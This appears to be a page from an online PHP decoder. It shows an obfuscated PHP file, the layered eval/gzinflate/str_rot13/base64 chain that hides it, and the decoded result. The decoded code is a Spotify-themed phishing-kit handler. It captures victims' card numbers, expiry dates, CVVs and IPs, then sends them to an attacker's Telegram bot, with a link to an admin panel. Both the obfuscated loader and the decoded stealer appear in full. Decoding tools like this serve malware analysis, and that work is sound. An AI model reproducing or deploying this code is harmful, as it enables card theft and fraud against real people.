Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $EdmHvftKflLGzwNYTps="AR8F4PoBGgXl+gEVBer6ARAF7/qdScth21MUXVuA/m5AECEVyHGTNlPhQA0..

Decoded Output download

/*==============[session_include]=================*/
session_start();

include("../ajax/Check_Bad.php");
include("../ajax/IP_INFO.php");
$md5 = md5(base64_encode(md5($ip))); 
$md5ip = hash('sha256', $md5);
/*==============[ConfiGG]=================*/
$wrng    = $_SESSION['wrng']= $_POST['wrng'];
$card = $_SESSION['jiji']= $_POST['jiji'];
$exp   = $_SESSION['jijiexp']= $_POST['jijiexp'];
$CVV   = $_SESSION['jijicode']= $_POST['jijicode'];
$ccc = str_replace(' ', '', $card);
$binaa = substr($ccc, 0, 6);
$tali = substr($ccc, 12, 18);
ob_start();
include("../ajax/bina.php");
$content = ob_get_clean();
$data = json_decode($content,true);
$banka = $data['bank']['name'];
$brandx = $data['scheme'];
$cncode = $data['country'];
$emojiya = $data['emoji'];
$typecc = $data['type'];
$brands = $data['brand'];
$ccinfo = "$emojiya | $binaa | $typecc | $brands | $brandx | $banka |";
///*==============[Sander]=================*/
if(isset($_POST['jiji'])){

$time = date('l jS \of F Y h:i:s A');
$YK = "BadExp - Spotify";

/*==============[Backup]=================*/


function functiondilih($cc)
    {
		/*==============[MSG]=================*/
        include ("api.php");
		/*==============[SEND]=================*/
		$ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, 'https://api.telegram.org/bot'.$key.'/sendMessage');
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, "chat_id=".$idchat."&text=".$cc."");
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

        $headers = array();
        $headers[] = 'Content-Type: application/x-www-form-urlencoded';
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    
        $result = curl_exec($ch);

        curl_close ($ch);
    }
    {
    $date = gmdate("H:i:s | d/m/Y");
    
    $path = "https://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
    $cccx = str_replace('jiji.php', '', $path);
    $victim_ip = getenv("REMOTE_ADDR");
    $MSG1 = urlencode("
--------------- CARD ".$YK."---------------
".($wrng    == "wrng" ? "
===========================================
Updated Card " : "")."
===========================================
  Country     =>  ".$rayax." | ".$countryname."
 Copy Credit Card  =>  ".$ccc."
===========================================
 CARD NUMBER      =>  ".$card."
 EXPIRY DATE      =>  ".$exp."
 CVV              =>  ".$CVV."
 CARD INFO        =>  ".$ccinfo."
===========================================
  IP              =>   ".$ip."
 TIME             =>   ".$date."
===========================================
 Admin Panel   =>   ".$cccx."../Exp_Manager/panel.php?ip=".$ip."&pwd=sir
===========================================
--------------- CARD ".$YK."---------------
");

    $file = fopen("../homa/".$ip.".txt","w");
    fwrite($file,"CCYA");
           

            functiondilih($MSG1);

          

            
        }
        
/*==============[header]=================*/
header("location:../?3D=".$md5ip);


    }
	else{header("Location: ../?JIJI=".$md5ip);
	
	}

Did this file decode correctly?

Original Code

<?php 
 $EdmHvftKflLGzwNYTps="AR8F4PoBGgXl+gEVBer6ARAF7/qdScth21MUXVuA/m5AECEVyHGTNlPhQA0UiY6V+KGSskTBFYgxOTLHplWCHFIS4iy7eBsg6abtIr9DoJt+Qn6g+YTeOyT1DmBqb8ec+zxm5z7GfNhLTBcZyzIeVC6PvGPss05wfT00q5VFKBM0FW3tdrVFrRQKum8YJr2mRrMVMO/GfUF9IwkSBYU2UTpdt2ZlYzoXQ1T+E9Ig8L9+VjO2943LIi8GDaSoPKnVd0JWLsYTEAx1FuhNFtDHQva0Ok46mjHXD9WKoyF/8W/7btRWGl0RSw2iuo7lOJ3TkwsNidoAVt1Gp0ruEaNURn9I9ppf83LZfI+yeZqsG1MmkNflJQlITefn20cwDOs6OVpv8jxDyVHqpiwJqcdnjUBANAwK4pXBveQRpSg2vgRWHZXq5Ks62ZNcTlC+znz0GH6/Uml8uWfZG/eIlheX6MWRYJEAcKBoxYTrhYxTRUb1qUAI1xlxj8/k3ZbyaJGOTA6UUzcoJaUvNNx3gwstoqPiuJcpjfzpTyLzAknyPJkxC54XjyORzor7GMXXfLZxWxJlnpglWYaxYOF+yV22BAj3cuBsNIyBpcx635Ii0vBE2FFFYaP8msovbM5bBUbW3FVNB8RLuj10+UPnTMaEvppltdobLFJI8BFTANBPIoTk2iE/xlBlQPok2Of7GXZ3Ms79SggcKtSCNN0lQRILPpwpspw34Dyn3s042Q4H/w3HkSegKZDyw+chDzCRd9UKlhdA29nZMHvsfKEsVrGKcSO6TxM+QrItlhzrpL3d1M6O6gVjR2KchtDYa57FpQNWhUvGCYTTC+qkaHMfnWl7LvyBEgqEVbJ901HvgoXsKqUjI0GvzMtLdYZtw3OGc3Ms8o+hKdIrpt3Jtnr1zuyTnt08ZA4sG6rsQU1r1wcd66jt1IniBUe43GIohsp93BjKA8GmAgmedCjKnVre1b3jHLnnlt056GotBD2kbsby7l/qqgGjkLVLLDRa6Xkl0iXzbwB5rZWX/WEPd3Gf0CQJuVQxZMzp7nEy2R3G6XUXoOQjwNfugvCw1+seTc02oiu9lQiWY6QsG4eizAg2ch6aTD2JcWxunE7qFVkkv50ns7SEJQZprlOy1pRQTF63xDdUc19M9awmR2AWKnJTboe3IZ4XiNo9hIsYzFa29f2Z5WAOaQZXbgZ78me9zXDhcEiU3R6dlH7V1xwqZOTKTAmNmFKvaMW2jkJ7ltt5t+05QBWq8BHIzKOtK9XK7uoirabdJpBb/UqGssarSRRQX8xEOCN+K+QZATsbJfnlSK2cJRhVn7RjyCpxn0AaG/c18vnjz78S0sobv7zMxmoEoVBP0qmhwAVujeR8nCro4fPH93+DQTIjrZT5XOQQV1oPK+reMNAiU+3k7Pi5cpNyKDiVZrcffiLWD92O3Sftc89NEYJUTi7z23uSvwuWSSED9Fzm3Z///vMu94ePqjWxfEP9jzN8+IWQQWrTNRrlEt6nan+RXufY2iqC12xir5/++B3P0vRUPCJdGrFjySJJgYFCD5hN7jGNoOemc4JPSwfPa9IokD1VJn4j4+k9nd8v7xdaUB3yEHvBMEFLJN9TTjyicwHGEEah1JXJvOaGk5RQy5BNaKXV6jdKGrZ5Gyvb9cGKNbvasjZIFru3i88twz1ilYONdeD0zGy6EsZse96Hkz37uo1Elu/wHMO8O+4wGApiV6WjRYmg1svOy86K3g78vFLl/wA=";
 @eval(gzinflate(str_rot13(gzinflate(str_rot13(gzinflate(str_rot13(gzinflate(str_rot13(gzinflate(str_rot13(base64_decode($EdmHvftKflLGzwNYTps))))))))))));
?>

Function Calls

gzinflate 5
str_rot13 5
base64_decode 1

Variables

$EdmHvftKflLGzwNYTps AR8F4PoBGgXl+gEVBer6ARAF7/qdScth21MUXVuA/m5AECEVyHGTNlPhQA0U..

Stats

MD5 3749c393ac9729a62c3b8e82bb83bc8e
Eval Count 1
Decode Time 86 ms